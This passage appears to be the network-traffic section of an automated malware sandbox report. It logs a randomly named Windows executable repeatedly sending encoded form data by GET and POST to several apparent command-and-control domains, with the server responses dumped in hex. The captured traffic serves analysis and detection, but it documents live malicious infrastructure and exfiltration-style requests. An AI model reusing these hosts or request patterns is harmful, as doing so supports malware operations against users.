                                              Data Ascii: <html><head><title>301 Moved Permanently</title></head><body><center><h1>301 Moved Permanently</h1></center><hr><center>cloudflare</center></body></html>


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              20192.168.2.749725188.114.96.3806392C:\Program Files (x86)\YrgEYtDOHUGmcLRrTUHZXQpKxBQAzGXkUVtTPmKzbAHHfbeNqppBnpekaSNxZCQdDupGJjEHB\QAWHbhvedb.exe
                                              TimestampBytes transferredDirectionData
                                              Jul 21, 2024 13:32:39.485057116 CEST449OUTGET /bked/?5HE=QDDEnNwQpb5JatkHP5Ujvy7oB3/mJq1wkhHN+QA3R40qpI1p3EHt4xIxf5IDvSUmLm24xdAndElLjryJNFC6VX5rU/4u1ZoNU71gjUwgGDzFCy1dhdBzksntmTnqyiroVCcmEoAnVJrC&UXR=kTP8XfI8 HTTP/1.1
                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                              Accept-Language: en-US,en;q=0.9
                                              Host: www.evoolihubs.shop
                                              Connection: close
                                              User-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.155 Safari/537.36
                                              Jul 21, 2024 13:32:39.957283020 CEST984INHTTP/1.1 301 Moved Permanently
                                              Date: Sun, 21 Jul 2024 11:32:39 GMT
                                              Content-Type: text/html
                                              Content-Length: 167
                                              Connection: close
                                              Cache-Control: max-age=3600
                                              Expires: Sun, 21 Jul 2024 12:32:39 GMT
                                              Location: https://www.evoolihubs.shop/bked/?5HE=QDDEnNwQpb5JatkHP5Ujvy7oB3/mJq1wkhHN+QA3R40qpI1p3EHt4xIxf5IDvSUmLm24xdAndElLjryJNFC6VX5rU/4u1ZoNU71gjUwgGDzFCy1dhdBzksntmTnqyiroVCcmEoAnVJrC&UXR=kTP8XfI8
                                              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=rFIo%2FboOpE8%2F4mTVspBBB%2FLiZ8ZYla5MNvWFXDSMIX7JU9nGtzoTDVfQCMVnxBzGr3yIEKKQ7e2W4noOAhoXaRCuCqyx2t5KEqyyUS3rbJaehKU2Hkhdv%2BGew1vNNnSC1o4pHSH4"}],"group":"cf-nel","max_age":604800}
                                              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                              Server: cloudflare
                                              CF-RAY: 8a6adf255e9e1778-EWR
                                              alt-svc: h3=":443"; ma=86400
                                              Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                              Data Ascii: <html><head><title>301 Moved Permanently</title></head><body><center><h1>301 Moved Permanently</h1></center><hr><center>cloudflare</center></body></html>


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              21192.168.2.749726203.161.41.207806392C:\Program Files (x86)\YrgEYtDOHUGmcLRrTUHZXQpKxBQAzGXkUVtTPmKzbAHHfbeNqppBnpekaSNxZCQdDupGJjEHB\QAWHbhvedb.exe
                                              TimestampBytes transferredDirectionData
                                              Jul 21, 2024 13:32:45.309068918 CEST706OUTPOST /or4s/ HTTP/1.1
                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                              Accept-Encoding: gzip, deflate, br
                                              Accept-Language: en-US,en;q=0.9
                                              Host: www.fardehb.top
                                              Origin: http://www.fardehb.top
                                              Connection: close
                                              Content-Length: 216
                                              Content-Type: application/x-www-form-urlencoded
                                              Cache-Control: no-cache
                                              Referer: http://www.fardehb.top/or4s/
                                              User-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.155 Safari/537.36
                                              Data Raw: 35 48 45 3d 5a 4d 39 7a 4c 38 68 45 51 43 73 56 76 32 59 47 74 6a 51 34 37 62 76 57 36 34 54 7a 7a 79 72 76 61 4d 59 44 7a 66 6a 51 45 50 59 7a 73 48 76 54 49 66 52 75 38 52 31 36 69 4b 79 66 62 54 49 51 6f 64 33 67 67 44 37 58 45 63 53 4c 30 46 30 47 2b 58 41 50 61 47 33 33 68 4c 38 41 4c 50 34 68 36 46 63 32 2b 51 67 71 70 33 4d 36 32 2f 45 4d 45 4d 53 39 4b 5a 4d 33 59 66 78 57 74 42 73 63 67 4e 7a 48 70 5a 50 49 38 32 78 4d 51 43 77 6b 72 34 42 68 55 30 6f 48 61 46 41 78 71 47 6d 73 5a 49 65 61 79 48 50 2f 74 74 45 4b 45 65 52 73 48 5a 5a 48 63 48 43 57 4f 45 30 70 62 67 69 78 4e 65 6a 48 2f 4e 65 62 65 30 42 47 43 6f 49 35 55 51 3d 3d
                                              Data Ascii: 5HE=ZM9zL8hEQCsVv2YGtjQ47bvW64TzzyrvaMYDzfjQEPYzsHvTIfRu8R16iKyfbTIQod3ggD7XEcSL0F0G+XAPaG33hL8ALP4h6Fc2+Qgqp3M62/EMEMS9KZM3YfxWtBscgNzHpZPI82xMQCwkr4BhU0oHaFAxqGmsZIeayHP/ttEKEeRsHZZHcHCWOE0pbgixNejH/Nebe0BGCoI5UQ==
                                              Jul 21, 2024 13:32:45.917604923 CEST533INHTTP/1.1 404 Not Found
                                              Date: Sun, 21 Jul 2024 11:32:45 GMT
                                              Server: Apache
                                              Content-Length: 389
                                              Connection: close
                                              Content-Type: text/html
                                              Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 77 69 6e 64 6f 77 73 2d 31 32 35 32 22 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 [TRUNCATED]
                                              Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              22192.168.2.749727203.161.41.207806392C:\Program Files (x86)\YrgEYtDOHUGmcLRrTUHZXQpKxBQAzGXkUVtTPmKzbAHHfbeNqppBnpekaSNxZCQdDupGJjEHB\QAWHbhvedb.exe
                                              TimestampBytes transferredDirectionData
                                              Jul 21, 2024 13:32:47.846599102 CEST726OUTPOST /or4s/ HTTP/1.1
                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                              Accept-Encoding: gzip, deflate, br
                                              Accept-Language: en-US,en;q=0.9
                                              Host: www.fardehb.top
                                              Origin: http://www.fardehb.top
                                              Connection: close
                                              Content-Length: 236
                                              Content-Type: application/x-www-form-urlencoded
                                              Cache-Control: no-cache
                                              Referer: http://www.fardehb.top/or4s/
                                              User-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.155 Safari/537.36
                                              Data Raw: 35 48 45 3d 5a 4d 39 7a 4c 38 68 45 51 43 73 56 76 53 6b 47 73 45 45 34 73 4c 76 52 31 59 54 7a 70 43 72 72 61 4d 45 44 7a 65 58 6d 48 35 67 7a 74 6d 66 54 48 2b 52 75 31 42 31 36 70 71 79 65 66 54 49 4f 6f 64 36 56 67 42 76 58 45 63 57 4c 30 41 49 47 39 6d 41 4f 56 32 33 31 73 72 39 47 55 2f 34 68 36 46 63 32 2b 51 6b 4d 70 33 45 36 32 76 30 4d 48 74 53 2b 4c 5a 4d 34 62 66 78 57 37 78 73 59 67 4e 79 67 70 63 72 75 38 77 31 4d 51 48 55 6b 71 70 42 67 66 30 6f 4a 55 6c 42 44 73 6c 44 55 5a 5a 6d 61 37 6d 44 4a 67 36 64 71 4d 49 4d 4f 64 37 56 72 43 57 36 74 4b 47 51 66 4d 47 2f 45 50 66 6e 66 79 76 71 36 42 44 6b 73 50 36 70 39 43 67 6d 47 56 34 46 74 46 37 62 50 31 52 31 4b 52 39 71 53 69 58 30 3d
                                              Data Ascii: 5HE=ZM9zL8hEQCsVvSkGsEE4sLvR1YTzpCrraMEDzeXmH5gztmfTH+Ru1B16pqyefTIOod6VgBvXEcWL0AIG9mAOV231sr9GU/4h6Fc2+QkMp3E62v0MHtS+LZM4bfxW7xsYgNygpcru8w1MQHUkqpBgf0oJUlBDslDUZZma7mDJg6dqMIMOd7VrCW6tKGQfMG/EPfnfyvq6BDksP6p9CgmGV4FtF7bP1R1KR9qSiX0=
                                              Jul 21, 2024 13:32:48.445993900 CEST533INHTTP/1.1 404 Not Found
                                              Date: Sun, 21 Jul 2024 11:32:48 GMT
                                              Server: Apache
                                              Content-Length: 389
                                              Connection: close
                                              Content-Type: text/html
                                              Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 77 69 6e 64 6f 77 73 2d 31 32 35 32 22 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 [TRUNCATED]
                                              Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              23192.168.2.749728203.161.41.207806392C:\Program Files (x86)\YrgEYtDOHUGmcLRrTUHZXQpKxBQAzGXkUVtTPmKzbAHHfbeNqppBnpekaSNxZCQdDupGJjEHB\QAWHbhvedb.exe
                                              TimestampBytes transferredDirectionData
                                              Jul 21, 2024 13:32:50.375916958 CEST1739OUTPOST /or4s/ HTTP/1.1
                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                              Accept-Encoding: gzip, deflate, br
                                              Accept-Language: en-US,en;q=0.9
                                              Host: www.fardehb.top
                                              Origin: http://www.fardehb.top
                                              Connection: close
                                              Content-Length: 1248
                                              Content-Type: application/x-www-form-urlencoded
                                              Cache-Control: no-cache
                                              Referer: http://www.fardehb.top/or4s/
                                              User-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.155 Safari/537.36
                                              Data Raw: 35 48 45 3d 5a 4d 39 7a 4c 38 68 45 51 43 73 56 76 53 6b 47 73 45 45 34 73 4c 76 52 31 59 54 7a 70 43 72 72 61 4d 45 44 7a 65 58 6d 48 36 41 7a 74 55 58 54 47 5a 6c 75 76 42 31 36 71 71 79 62 66 54 4a 53 6f 64 69 52 67 42 7a 48 45 66 2b 4c 6d 32 63 47 38 55 6f 4f 43 47 33 31 7a 37 38 42 4c 50 34 77 36 46 4d 79 2b 51 30 4d 70 33 45 36 32 73 73 4d 54 73 53 2b 4a 5a 4d 33 59 66 78 53 74 42 74 48 67 4d 62 66 70 64 72 59 38 41 56 4d 51 6e 45 6b 73 62 35 67 64 55 70 76 54 6c 42 62 73 6c 2f 4c 5a 5a 37 68 37 6d 32 6d 67 39 35 71 64 4f 41 4e 5a 76 5a 6f 55 77 75 31 4e 58 34 6e 43 41 33 55 4c 74 62 35 79 59 4f 4b 4e 67 67 6d 57 4a 39 7a 4b 31 48 36 45 65 68 2b 64 35 37 2b 6a 31 59 66 44 50 43 46 34 44 45 6b 37 45 79 69 65 62 63 68 74 62 76 66 35 37 45 58 6e 77 42 6d 2f 2f 44 6c 63 4f 53 70 41 72 36 5a 65 65 64 59 73 32 79 49 51 59 46 72 6e 63 69 68 56 49 45 63 4e 59 4f 63 73 53 71 54 6e 52 49 37 63 74 31 4e 62 56 41 4d 39 33 73 47 6c 41 4b 30 45 6f 35 37 31 6a 31 67 76 62 47 2f 4f 66 58 58 6e 6a 56 4b 36 48 [TRUNCATED]
                                              Data Ascii: 5HE=ZM9zL8hEQCsVvSkGsEE4sLvR1YTzpCrraMEDzeXmH6AztUXTGZluvB16qqybfTJSodiRgBzHEf+Lm2cG8UoOCG31z78BLP4w6FMy+Q0Mp3E62ssMTsS+JZM3YfxStBtHgMbfpdrY8AVMQnEksb5gdUpvTlBbsl/LZZ7h7m2mg95qdOANZvZoUwu1NX4nCA3ULtb5yYOKNggmWJ9zK1H6Eeh+d57+j1YfDPCF4DEk7Eyiebchtbvf57EXnwBm//DlcOSpAr6ZeedYs2yIQYFrncihVIEcNYOcsSqTnRI7ct1NbVAM93sGlAK0Eo571j1gvbG/OfXXnjVK6HWJrC1t3OFl03suMhxY+Pn+e92FMBFw6NKkr/9hHGdV9bbxXB0hf5s9F6T7pQQFUrs5Xo0djfzpTk4hcEtm128XOPPWJCJK+QNGSU5pwT6XU9RQIE2Ns+t0X5gWoIUleI1saaHKo7FBTqTh9SGy+caQ2e+s1F6Z5Mzcwnwp1FGmhzO0LLyUC/S4S5dyk9XbaVn9mbR9RM0DCLm0V+NQ/N7GFhuI2ZU3VRJiCHfM+NUgJSKBOWvjoI/wPQh0rSxgsbXjgy6h9Lmh5e85R+U2MtVEJBh/eqoTjFqy5yLy4i18H028r4QgtdOlXxHmX3AGA5nezVLBqQR5RRfLN2L3jddYnvK6LI7dLoqko0QbCeKWLmoPQLnLEsMnaOrhIj44CBtVwoxkDHkYXTAsw7zZGmfM6pItuBr7kc1owpL4K8tWZ0XE8hJQVrHP7fqZL86ThkEvQOqzjTjud2mhSb5k7Hpy6TDTlXtP2Eia78e9boa/2UdlWwpB/x5N3bYzbeXUdHyd9RuhQRuw+etTg+HQFEmKwSsVYpqMkI2KtE/ZP9Lb3k2oyYOhHJ3i++RgL0m88qQkcpGeVe5KZBbQsV/ixXk8QmcgcnGYPOInM834pYVVjHomi8XPgkfGU6WG8YpEBnpv/B76SHf/RevWwEPTIsvMRSn9MOdxqcBr [TRUNCATED]
                                              Jul 21, 2024 13:32:51.011807919 CEST533INHTTP/1.1 404 Not Found
                                              Date: Sun, 21 Jul 2024 11:32:50 GMT
                                              Server: Apache
                                              Content-Length: 389
                                              Connection: close
                                              Content-Type: text/html
                                              Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 77 69 6e 64 6f 77 73 2d 31 32 35 32 22 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 [TRUNCATED]
                                              Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              24192.168.2.749729203.161.41.207806392C:\Program Files (x86)\YrgEYtDOHUGmcLRrTUHZXQpKxBQAzGXkUVtTPmKzbAHHfbeNqppBnpekaSNxZCQdDupGJjEHB\QAWHbhvedb.exe
                                              TimestampBytes transferredDirectionData
                                              Jul 21, 2024 13:32:52.907337904 CEST445OUTGET /or4s/?5HE=UOVTILZNORwRjwgBkAdUsPPg2JHxvT7McsE496DqNpR2tR/wGus0wQl5jLS0JR4P7qKOiEjtUO6PhFxn6GFMV2L3p99CK/w4pk8/xjMAjlx+vsYxSa6ADJMuQ/dVnyYbrtzDu6vYzAhS&UXR=kTP8XfI8 HTTP/1.1
                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                              Accept-Language: en-US,en;q=0.9
                                              Host: www.fardehb.top
                                              Connection: close
                                              User-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.155 Safari/537.36
                                              Jul 21, 2024 13:32:53.501008034 CEST548INHTTP/1.1 404 Not Found
                                              Date: Sun, 21 Jul 2024 11:32:53 GMT
                                              Server: Apache
                                              Content-Length: 389
                                              Connection: close
                                              Content-Type: text/html; charset=utf-8
                                              Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 77 69 6e 64 6f 77 73 2d 31 32 35 32 22 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 [TRUNCATED]
                                              Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              25192.168.2.74973084.32.84.32806392C:\Program Files (x86)\YrgEYtDOHUGmcLRrTUHZXQpKxBQAzGXkUVtTPmKzbAHHfbeNqppBnpekaSNxZCQdDupGJjEHB\QAWHbhvedb.exe
                                              TimestampBytes transferredDirectionData
                                              Jul 21, 2024 13:32:58.613533020 CEST706OUTPOST /rjez/ HTTP/1.1
                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                              Accept-Encoding: gzip, deflate, br
                                              Accept-Language: en-US,en;q=0.9
                                              Host: www.sehraji.com
                                              Origin: http://www.sehraji.com
                                              Connection: close
                                              Content-Length: 216
                                              Content-Type: application/x-www-form-urlencoded
                                              Cache-Control: no-cache
                                              Referer: http://www.sehraji.com/rjez/
                                              User-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.155 Safari/537.36
                                              Data Raw: 35 48 45 3d 57 6c 53 71 66 73 6a 55 2b 66 68 6a 67 49 6e 4b 5a 68 64 65 6c 2b 58 5a 71 32 71 69 58 77 67 37 4a 67 69 48 2b 6e 48 31 2b 6e 52 31 79 51 39 47 31 34 64 56 56 34 78 32 4a 71 66 45 72 65 52 4a 77 57 34 31 69 4c 64 48 75 4c 71 51 75 56 51 73 71 79 79 4b 39 31 42 36 35 61 32 2f 34 78 66 49 39 36 58 58 79 6e 79 31 5a 68 33 50 38 37 66 48 66 5a 36 32 4a 6c 6f 4c 49 45 34 42 33 76 53 4e 78 30 54 6c 32 74 2f 43 54 4b 78 2b 2f 35 65 4e 53 49 32 44 53 4a 54 62 55 69 53 46 72 4d 4d 47 4a 57 4b 73 4a 78 53 6c 4d 47 55 31 65 41 43 35 4b 6e 44 4a 71 2b 43 6b 53 62 4b 30 64 66 33 43 4f 48 74 36 67 44 55 34 44 4e 64 59 77 77 32 6a 2b 51 3d 3d
                                              Data Ascii: 5HE=WlSqfsjU+fhjgInKZhdel+XZq2qiXwg7JgiH+nH1+nR1yQ9G14dVV4x2JqfEreRJwW41iLdHuLqQuVQsqyyK91B65a2/4xfI96XXyny1Zh3P87fHfZ62JloLIE4B3vSNx0Tl2t/CTKx+/5eNSI2DSJTbUiSFrMMGJWKsJxSlMGU1eAC5KnDJq+CkSbK0df3COHt6gDU4DNdYww2j+Q==


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              26192.168.2.74973184.32.84.32806392C:\Program Files (x86)\YrgEYtDOHUGmcLRrTUHZXQpKxBQAzGXkUVtTPmKzbAHHfbeNqppBnpekaSNxZCQdDupGJjEHB\QAWHbhvedb.exe
                                              TimestampBytes transferredDirectionData
                                              Jul 21, 2024 13:33:01.157653093 CEST726OUTPOST /rjez/ HTTP/1.1
                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                              Accept-Encoding: gzip, deflate, br
                                              Accept-Language: en-US,en;q=0.9
                                              Host: www.sehraji.com
                                              Origin: http://www.sehraji.com
                                              Connection: close
                                              Content-Length: 236
                                              Content-Type: application/x-www-form-urlencoded
                                              Cache-Control: no-cache
                                              Referer: http://www.sehraji.com/rjez/
                                              User-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.155 Safari/537.36
                                              Data Raw: 35 48 45 3d 57 6c 53 71 66 73 6a 55 2b 66 68 6a 6a 72 2f 4b 4b 77 64 65 74 2b 58 61 76 32 71 69 65 51 67 2f 4a 67 75 48 2b 69 6e 6c 39 56 31 31 79 78 4e 47 37 64 70 56 63 6f 78 32 43 4b 65 4d 6c 2b 52 34 77 57 6c 4b 69 4c 68 48 75 4c 2b 51 75 58 49 73 71 43 4f 4a 6e 46 41 63 69 4b 32 39 32 52 66 49 39 36 58 58 79 6e 6e 75 5a 6c 62 50 38 72 76 48 65 34 36 31 48 46 6f 4d 50 45 34 42 39 50 53 42 78 30 53 79 32 70 65 5a 54 50 31 2b 2f 35 75 4e 63 35 32 41 5a 4a 54 43 51 69 54 35 6c 38 78 63 46 6a 36 43 4a 79 57 2b 45 67 30 4d 62 32 66 62 51 46 50 6c 30 76 36 66 57 5a 75 43 4b 35 71 33 4d 47 70 69 74 68 67 5a 63 36 34 79 39 69 58 6e 6f 76 4c 63 30 76 4b 6f 79 55 71 46 49 75 36 4f 62 6e 31 68 32 74 38 3d
                                              Data Ascii: 5HE=WlSqfsjU+fhjjr/KKwdet+Xav2qieQg/JguH+inl9V11yxNG7dpVcox2CKeMl+R4wWlKiLhHuL+QuXIsqCOJnFAciK292RfI96XXynnuZlbP8rvHe461HFoMPE4B9PSBx0Sy2peZTP1+/5uNc52AZJTCQiT5l8xcFj6CJyW+Eg0Mb2fbQFPl0v6fWZuCK5q3MGpithgZc64y9iXnovLc0vKoyUqFIu6Obn1h2t8=


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              27192.168.2.74973284.32.84.32806392C:\Program Files (x86)\YrgEYtDOHUGmcLRrTUHZXQpKxBQAzGXkUVtTPmKzbAHHfbeNqppBnpekaSNxZCQdDupGJjEHB\QAWHbhvedb.exe
                                              TimestampBytes transferredDirectionData
                                              Jul 21, 2024 13:33:03.689584970 CEST1739OUTPOST /rjez/ HTTP/1.1
                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                              Accept-Encoding: gzip, deflate, br
                                              Accept-Language: en-US,en;q=0.9
                                              Host: www.sehraji.com
                                              Origin: http://www.sehraji.com
                                              Connection: close
                                              Content-Length: 1248
                                              Content-Type: application/x-www-form-urlencoded
                                              Cache-Control: no-cache
                                              Referer: http://www.sehraji.com/rjez/
                                              User-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.155 Safari/537.36
